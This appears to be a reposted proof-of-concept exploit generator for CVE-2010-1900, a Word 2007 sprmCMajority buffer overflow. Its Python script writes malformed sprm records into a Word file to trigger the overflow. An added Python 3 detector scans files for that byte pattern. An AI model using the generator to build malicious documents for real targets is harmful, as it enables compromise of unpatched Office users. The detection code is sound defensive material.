[Repost] MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow
Posted: 2010-9-11 22:04
'''
  __  __  ____         _    _ ____
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
'''
'''
Title : Microsoft Office Word sprmCMajority buffer overflow
Version : Word 2007 SP 2
Analysis :
Vendor :
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1900
'''
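import sys

# Python 2 script (print statements, byte strings written as str).
def main():
    try:
        # Template document the script expects in the working directory
        fdR = open('src.doc', 'rb+')
        strTotal = fdR.read()
        # Keep everything except the 6 bytes at offsets 4082-4087
        str1 = strTotal[:4082]
        str2 = strTotal[4088:]
        # Each record: 2-byte little-endian sprm opcode + 1-byte length (0xFF)
        sprmCMajority = "\x47\xCA\xFF" # sprmCMajority
        sprmPAnld80 = "\x3E\xC6\xFF" # sprmPAnld80
        # Write the patched copy; the file length is unchanged (6 bytes out, 6 in)
        fdW = open('poc.doc', 'wb+')
        fdW.write(str1)
        fdW.write(sprmCMajority)
        fdW.write(sprmPAnld80)
        fdW.write(str2)
        fdW.close()
        fdR.close()
        print '[-] Word file generated'
    except IOError:
        print 'Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)

if __name__ == '__main__':
    main()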
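A defender-side triage check for the pattern this script writes, as an added Python 3 example that is not part of the original post or of the Abysssec code: it decodes the sprm bit fields (MS-DOC layout) and scans raw bytes for the two opcodes above carrying a 0xFF length byte. The function names and the two sample buffers are constructed for illustration.

```python
import struct

# Opcodes and the 0xFF length byte are the ones written by the script above.
SUSPECT = {0xCA47: "sprmCMajority", 0xC63E: "sprmPAnld80"}
SGC = {1: "paragraph", 2: "character", 3: "picture", 4: "section", 5: "table"}

# Constructed sample buffers (not real documents).
CLEAN = b"\x00" * 32 + b"\x47\xCA\x02\x00\x00" + b"\x00" * 32
PATCHED = b"\x00" * 32 + b"\x47\xCA\xFF\x3E\xC6\xFF" + b"\x00" * 32


def decode_sprm(opcode):
    """Split a 16-bit sprm into its MS-DOC bit fields."""
    return {
        "ispmd": opcode & 0x01FF,                         # bits 0-8: property id
        "fSpec": (opcode >> 9) & 0x1,                     # bit 9: special handling
        "sgc": SGC.get((opcode >> 10) & 0x7, "unknown"),  # bits 10-12: property group
        "spra": (opcode >> 13) & 0x7,                     # bits 13-15: operand size code
    }


def scan(data, cb=0xFF):
    """Return (offset, name, length_byte) for each suspect variable-length
    sprm (spra == 6) whose length byte equals cb. This is a raw byte scan that
    does not parse the OLE container, so hits are leads for review, not verdicts."""
    hits = []
    for off in range(len(data) - 2):
        (opcode,) = struct.unpack_from("<H", data, off)
        name = SUSPECT.get(opcode)
        if name and decode_sprm(opcode)["spra"] == 6 and data[off + 2] == cb:
            hits.append((off, name, data[off + 2]))
    return hits


def looks_like_moaub11(data):
    """True when sprmCMajority(0xFF) is directly followed by sprmPAnld80(0xFF)."""
    hits = {off: name for off, name, _ in scan(data)}
    return any(name == "sprmCMajority" and hits.get(off + 3) == "sprmPAnld80"
               for off, name in hits.items())
```

To check a file, pass its bytes: `looks_like_moaub11(open(path, "rb").read())`.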